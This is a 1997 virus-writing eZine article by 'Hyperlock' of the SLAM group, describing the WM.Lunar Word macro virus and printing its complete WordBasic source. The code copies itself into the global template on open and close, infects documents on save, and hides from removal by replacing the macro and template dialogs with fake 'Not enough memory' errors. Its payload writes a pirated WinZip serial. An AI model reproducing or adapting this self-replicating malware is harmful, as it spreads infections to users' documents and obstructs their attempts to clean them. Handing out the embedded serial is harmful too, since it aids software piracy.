SLAM3.016: Lunar Word Macro Virus by Hyperlock [SLAM]

eZine lover (@eZine)

Published in 

Slam

 · 2 years ago

Lunar Word Macro Virus

by Hyperlock [SLAM]

Identification:

• VIRUSNAME: WM.Lunar.a
• SIZE: 17,920 Bytes (8 Macros)
• VERSION: v1.00
• ORIGIN: United Kingdom
• AUTHOR: Hyperlock
• DATE: June, 1997

Characteristics:

• Polymorphism: No
• Stealth: Disables all normal methods of macro deletion
• Encrypted: Yes
• Retro: No
• External Infection: No
• Other Properties: Auto-Registration of WinZip
• Word Version: 32-bit versions only (API calls)

VIRUS DESCRIPTION

This virus makes extensive use of the API, in particular user32.exe, to perform some otherwise impossible tasks. I have had it with messing about with Word's crappie built-in functions, and there is rarely anything interesting worth searching for that may be of any use and even if there are, they don't fuckin' work properly.

Being a lazy bastard, I have disabled most calls for macro viewing be just displaying a message box and not processing the request. I would have put some decent stealth on it, but am still fuckin' writing it. When finished, it will be an extension of Virtual Boy's add-in stealth method (nice one VB!), but should work a bit better and stops Word complaining about invalid add-ins when loading. I am still working on a tunnelling virus for Excel and is a 7-level tunneller at the moment! Getting better.

Anyway, back to business. Like I said, I have used basic stealth, but it works and will just annoy the fuck out of anyone without a brain. So, macros FileTemplates and ToolsMacro are both disabled. It's propagation is quite r obust, and is based loosely on the method of the Hyper virus (still not detected by virus scanners, and in case you wondered AV people, IT IS IN THE FUCKIN' WILD NOW!!! I.E., MORE THAN TWO COMPANIES).

The interesting bit is the use of the API to change Word's system menu. Any option can be altered, but in the case of the Lunar virus, it changes the Close option to SLAM and disables the option. You will also notice it disables the Close button as well, which isn't fuckin' surprising as it is the same ID. This now forces the use of FileExit to exit Word and it just so happens that I have made FileExit the payload. Well, fuck me if that was a coincidence!

The payload is non destructive to data, and even does some good from the user's point of view. The payload automatically registers WinZip 6.x (the current and future versions that support current registration details) to be 'SLAM Virus Team'. If a registration already exists then it leaves it. This removes the annoying start-up dialog box so it is good from that point of view.

So, to summarise, here are the virus's macros:

• AutoExec
• AutoOpen
• AutoClose
• FileExit
• FileSaveAs
• FileSave
• FileTemplates
• ToolsMacro

And lastly, in case YOU CAN'T BE FUCKIN' BOTHERED LOOKING AT THE CODE, here is the official 'SLAM Virus Team' WinZip registration name and code:

• Name: SLAM Virus Team
• SN: 47036847

If you are a lazy bastard, you can let this virus register it for you <<laugh>>.

Hyperlock [SLAM]

VIRUS CODE

---------------------------------------------------------------------------------------- 

REM 
REM WM.Lunar virus 
REM AutoExec macro 
REM 

Declare Function FindWindowA Lib "User32"(lpClassName$, lpWindowName As Long) As Integer 

Declare Function GetFocus Lib "User32"() As Integer 

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer 

Declare Function ModifyMenuA Lib "User32"(hMenu As Integer, nPosition As Integer, wFlags As Integer, wIDNewItem As Integer, lpString$) As Integer 

Declare Function GetMenuItemID Lib "User32"(hMenu As Integer, nPos As Integer) As Integer 

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer 

 

Sub MAIN 
On Error Goto endsub 

x = AlterMenu("SLAM", 6, 1) 

endsub: 
End Sub 

 
Function AlterMenu(item$, item, flag) 

  hWnd = FindWindowA("OPUSAPP", 0) 
  hmenu = getsystemmenu(hwnd, 0) 
  hItem = getmenuitemid(hMenu, item) 
  AlterMenu = ModifyMenuA(hmenu, hitem, flag, - 10, item$) 

End Function 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM Autoopen macro 
REM 

Declare Function FindWindowA Lib "User32"(lpClassName$, lpWindowName As Long) As Integer 

Declare Function GetFocus Lib "User32"() As Integer 

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer 

Declare Function ModifyMenuA Lib "User32"(hMenu As Integer, nPosition As Integer, wFlags As Integer, wIDNewItem As Integer, lpString$) As Integer 

Declare Function GetMenuItemID Lib "User32"(hMenu As Integer, nPos As Integer) As Integer 

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer 

 
Sub MAIN 
On Error Goto endsub 

	x = AlterMenu("SLAM", 6, 1) 

	DisableInput 1 
	ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0 

	ct$ = FileName$() 
	MacroCopy ct$ + ":autoexec", "global:autoexec", 1 
	MacroCopy ct$ + ":autoclose", "global:autoclose", 1 
	MacroCopy ct$ + ":autoopen", "global:autoopen", 1 
	MacroCopy ct$ + ":filesaveas", "global:filesaveas", 1 
	MacroCopy ct$ + ":filesave", "global:filesave", 1 
	MacroCopy ct$ + ":toolsmacro", "global:toolsmacro", 1 
	MacroCopy ct$ + ":filetemplates", "global:filetemplates", 1 
	profupdate 

endsub: 
End Sub 

 

Sub profupdate 

	entry$ = GetPrivateProfileString$("virus", "lunar", "lunar.ini") 

	If entry$ = "" Then 
	  SetPrivateProfileString("virus", "lunar", "1", "lunar.ini") 
	  SetPrivateProfileString("virus", "author", "Hyperlock", "lunar.ini") 

	Else 
	  a = Val(entry$) + 1 
	  entry$ = Str$(a) 
	  SetPrivateProfileString("virus", "lunar", entry$, "lunar.ini") 
	End If 

End Sub 

 

Function AlterMenu(item$, item, flag) 

  hWnd = FindWindowA("OPUSAPP", 0) 
  hmenu = getsystemmenu(hwnd, 0) 
  hItem = getmenuitemid(hMenu, item) 
  AlterMenu = ModifyMenuA(hmenu, hitem, flag, - 10, item$) 

End Function 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM Autoclose macro 
REM 

Sub MAIN 
On Error Goto endsub 

	DisableInput 1 
	ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0 

	REM copy macros 
	ct$ = FileName$() 
	MacroCopy ct$ + ":autoexec", "global:autoexec", 1 
	MacroCopy ct$ + ":autoclose", "global:autoclose", 1 
	MacroCopy ct$ + ":autoopen", "global:autoopen", 1 
	MacroCopy ct$ + ":filesaveas", "global:filesaveas", 1 
	MacroCopy ct$ + ":filesave", "global:filesave", 1 
	MacroCopy ct$ + ":toolsmacro", "global:toolsmacro", 1 
	MacroCopy ct$ + ":filetemplates", "global:filetemplates", 1 
	autoopen.profupdate 

endsub: 
End Sub 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM FileExit macro (Payload) 
REM 

Sub MAIN 
On Error Goto endsub 

name$ = GetProfileString$("WinZip", "Name") 
sn$ = GetProfileString$("WinZip", "SN") 

If name$ = "" Then 
  SetProfileString("Winzip", "Name", "SLAM Virus Team") 
  SetProfileString("Winzip", "SN", "47036847") 
End If 

endsub: 
FileExit 
End Sub 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM FileSaveAs Macro 
REM 

 
Sub MAIN 
On Error Goto endsub 

	DisableInput 1 
	ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0 
	DisableAutoMacros 0 
	SetDocumentDirty 

	Dim dlg As FileSaveAs 
	GetCurValues dlg 
	Dialog dlg 
	dlg.Format = 1 

	ct$ = FileName$() 

	MacroCopy "global:autoexec", ct$ + ":autoexec", 1 
	MacroCopy "global:autoclose", ct$ + ":autoclose", 1 
	MacroCopy "global:autoopen", ct$ + ":autoopen", 1 
	MacroCopy "global:filesaveas", ct$ + ":filesaveas", 1 
	MacroCopy "global:filesave", ct$ + ":filesave", 1 
	MacroCopy "global:toolsmacro", ct$ + ":toolsmacro", 1 
	MacroCopy "global:filetemplates", ct$ + ":filetemplates", 1 
	autoopen.profupdate 

	FileSaveAs dlg 

	REM bypass the if statement below 
	Err = 102 

endsub: 
	If Err <> 102 Then 
	  FileSaveAs dlg 
	End If 

End Sub 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM FileSave macro 
REM 

Sub MAIN 
On Error Goto endsub 
REM stops error 24 when macros already exist 

	DisableInput 1 
	ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0 
	DisableAutoMacros 0 
	SetDocumentDirty 

	REM Force document to be a template (change to template and save) 
	Dim dlg As FileSaveAs 
	GetCurValues dlg 
	dlg.Format = 1 
	FileSaveAs dlg 

	ct$ = FileName$() 
	MacroCopy "global:autoexec", ct$ + ":autoexec", 1 
	MacroCopy "global:autoclose", ct$ + ":autoclose", 1 
	MacroCopy "global:autoopen", ct$ + ":autoopen", 1 
	MacroCopy "global:filesaveas", ct$ + ":filesaveas", 1 
	MacroCopy "global:filesave", ct$ + ":filesave", 1 
	MacroCopy "global:toolsmacro", ct$ + ":toolsmacro", 1 
	MacroCopy "global:filetemplates", ct$ + ":filetemplates", 1 
	autoopen.profupdate 

	FileSave 

	REM bypass the if statement below 
	Err = 102 

endsub: 
 	If Err <> 102 Then 
	  FileSave 
	End If 

End Sub 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM FileTemplates macro 
REM 

Sub MAIN 

	MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48) 

End Sub 

 
---------------------------------------------------------------------------------------- 

 
REM 
REM WM.Lunar 
REM ToolsMacro macro 
REM 

Sub MAIN 

	MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48) 

End Sub 

 
----------------------------------------------------------------------------------------

HL [SLAM]